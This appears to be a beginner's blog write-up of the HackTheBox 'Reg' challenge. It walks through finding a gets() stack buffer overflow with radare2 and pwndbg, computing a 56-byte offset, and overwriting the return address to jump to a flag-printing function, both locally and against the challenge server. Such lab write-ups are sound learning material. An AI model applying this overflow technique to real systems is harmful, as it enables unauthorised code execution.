Introduction to Binary Exploitation | Reg HTB
What I know about the Binary Exploitation - 0x101
First of all, I'm not so fit to the Binary Exploitation world and also I have less experience in it. Anyway I want to learn more about the binary exploitation, but before that I thought to outline what I know here. So If there is anything wrong, please be kind to reach me out. 🤥🤥
Here I'm not going to explain more details about basic registers, stack frames and assembly codes. You can do some self studies and learn such things. Without wasting time on google click here to know detailed explanation about the Functions and Stack.😁😁
Enough talks 🤐🤐 Let me put in my two-penny worth..
Here I chose the binary file from HackTheBox Reg challenge. You can download that binary from here also. Verify the md5 after downloading the file.
Now let's decompress the zip file. To do that we can use the unzip command. Then it will ask the password. Type hackthebox
and hit enter.
Let's start to tackle with the binary file now. Normally we can do a quick walk around the binary file before we pulling out the big guns to the audience. So first thing first, use file
command to check what kind of file we have in the desk.
The file
command output releases that, the reg
file is an ELF(Executable and Linkable Format) 64 bit binary and it is not stripped. What it means is, if the binary file has been complied with gcc's -g
flag, that binary file contains the debug information. Generally in strip binary, the debug information is removed to reduce the file size. 🤐🤐
Again we have a fancy bash script called checksec
to check the properties of executables and kernel security options (like GRSecurity and SELinux). We can execute it by checksec filename
and let's have a look at what we've got..
The checksec script's results give us very important information about the binary file. I found a blog post which explains each flag in details. Click here to view that blog. I have attached a part of it below.
Now you have some idea about the flags. We can also get those information using Radare2. You will learn more about this tool in the future.
Then we are done with basic Static Analysis. Now, time to go ahead with Dynamic Analysis. First, change the permission (chmod +x reg
) of the file to executable and then run (./reg
) the binary file.
The binary will ask to Enter your name :
and we can enter anything and hit enter. Boom! nothing interesting found at all.😂😂
Since it asks inputs, we can check whether it has buffer overflow vulnerability by entering a large number of buffer as input to the input field. Following python command will generate character "A" 200 times and I redirect that output to the file called input
.
Now we can give that input
file as the input of our binary file.😵😵 or we can simply copy above output, then paste and enter to the program when it asks to Enter your name :
Yeah! The binary hit the Segmentation fault.
"In computing, a segmentation fault or access violation is a fault, or failure condition, raised by hardware with memory protection, notifying an operating system the software has attempted to access a restricted area of memory. On standard x86 computers, this is a form of general protection fault" source
Simply It means, the program has buffer overflow. Let's pull out the big guns now.😎😎
Here I used Radare2 to analyze the binary file first. So... Let's load the binary to the radare2
radare2 ./reg
Then type aaa
and hit enter to analyze all referenced code. If you have any doubts about what aaa
command exactly does, click here. 👈👈
After it's done, analyze progress. We can use afl
command to list all the functions in the binary file. Final output will be like this. 👇👇
Click here for Radare2 cheat sheet.
As you can see here, there are 3 functions which are very interesting. One is called main
, without questions we can say it is the main function of the program. But what about the other two functions? 🤷♂️🤷♂️ So let's keep that in the back pocket for a while and move on.
Now I need to know the program entry points [ie
], main address location [iM
] and what are the strings [iz
] which are inside this binary file.
Now the progress is pretty interesting. We found two strings called Congratulations!
and flag.txt
At this point we can get the idea that there is a function in this binary which contains above two strings and that function will expose the flag as well. Let's keep digging deeper... We can use /
and search any string inside this binary file. Let's say you want to know where the Congratulations!
string is containing inside the binary, you can run the following command.👇👇
Not getting enough information. So, let's move on to the Visual mode in radare2 by typing V
[Uppercase] and hitting enter. Then again use v
[lowercase] to switch between select function, variable and xref. Navigation can be done using HJKL
or arrow keys
and PgUp/PgDown
keys. If you are lost, press ?
to get help.😋😋
After digging through the functions we found two interesting points.
- The binary gets the inputs using
gets
function. - The string called
Congratulations!
is inside thesys.winner
function.
First of all, let me tell you a short story about gets
. In C Programming Language, it has common vulnerable functions which allow to buffer overflow. Click here to see more detailed information. And gets
also includes above mentioned functions. Let's have a look at manual page for the command gets
This 👇 description from the manual page says Never use this function.
Here is the bug explained simply. If you wish to know more details about that bug, click here to view CWE-242 (Use of Inherently Dangerous Function)
The story ends. 😟😟
Let's take a look at what's inside the winner
function. Select the function using s sys.winner
and then use pdf
command to see the function disassembly.
All right, the program is opening the file called flag.txt
and we have to read that flag.txt
by using the advantage of gets
function's buffer overflow vulnerability. Cool! 😎😎
So now we need to find the instruction pointer
which caused the segmentation fault. To do that, I am going to use GDB. But since I'm not a master in the assembly world, I used the plugin called pwndbg . That makes debugging with GDB suck less.😁😁 You can download it from here.
Then we can use following command to open the pwndbg
with binary file.
gdb-pwndbg reg
We can use run
command to run the program inside the pwndbg
.
Also we can use info functions
to get all the function information.
In the beginning, we used a simple python script to make pattern which included the letter "A". But here we can use cyclic
command to create string patterns.
Let's make a 150 length random string pattern using cyclic 150
Then copy the pattern to clipboard, run
the binary file and paste the previously copied string pattern when it asks for input. Finally hit enter. pwndbg will show everything you need to know.
You will see that we have crashed the program and now we need to find at what point we did overflow the instruction pointer (also known as RIP). Since this is a 64bit binary, we do not have any pattern on the RIP. Therefore, we need to get offset from somewhere else. As you can see here, the Stack Pointer (RSP) currently contains a value starting from oaaa
and that's the address where the the program is going to jump as next instruction pointer (RIP) which was the return (ret).
Now we need to get the offset value. You can get the offset value in two different ways.
- You can get the last 4 in RBP which is
naaa
in this case and whatever comes after that is our RIP. - Also you can get the first 4 in RSP which is
oaaa
and that is our RIP.
To view the offset value we can use cyclic -l <pattern>
as follows.👇👇
So now we know the offset value. Thus we have to enter 56 bytes first and then overwrite the Stack Pointer (RSP).
Let's check if we are correct. Create a fake flag called flag.txt
in the current working directory.
Then we need to find the address of winner
function. Again, I used radare2 to get that address.
Now let's create the payload using a simple python script. What it dose is, it prints 56 "A"s and then prints the return address of winner function which we need to jump to. Here I used python pwntools
to pack that address in little endian format. Also you can use struct
library to do so.
Let's check by importing that payload to the binary file as input.
Voila! we got our fake flag. It means the payload is 100% working. Let's jump to check whether we can use it to remote sever using netcat tool.
Aaaaand it was successful. 🤘🤘
I hope you enjoyed the writeup. And if there is anything wrong, please be kind enough to send a feedback because you know, I'm not really matching to the assembly world.🤧🤧
Next time we will digging into the pwntools
library more because it has got more power when it comes to the binary exploitation world. I mean, things can be run as automation and it makes things easier than doing it manually.
Ciao.🙋♂️🙋♂️
Find me on @twitter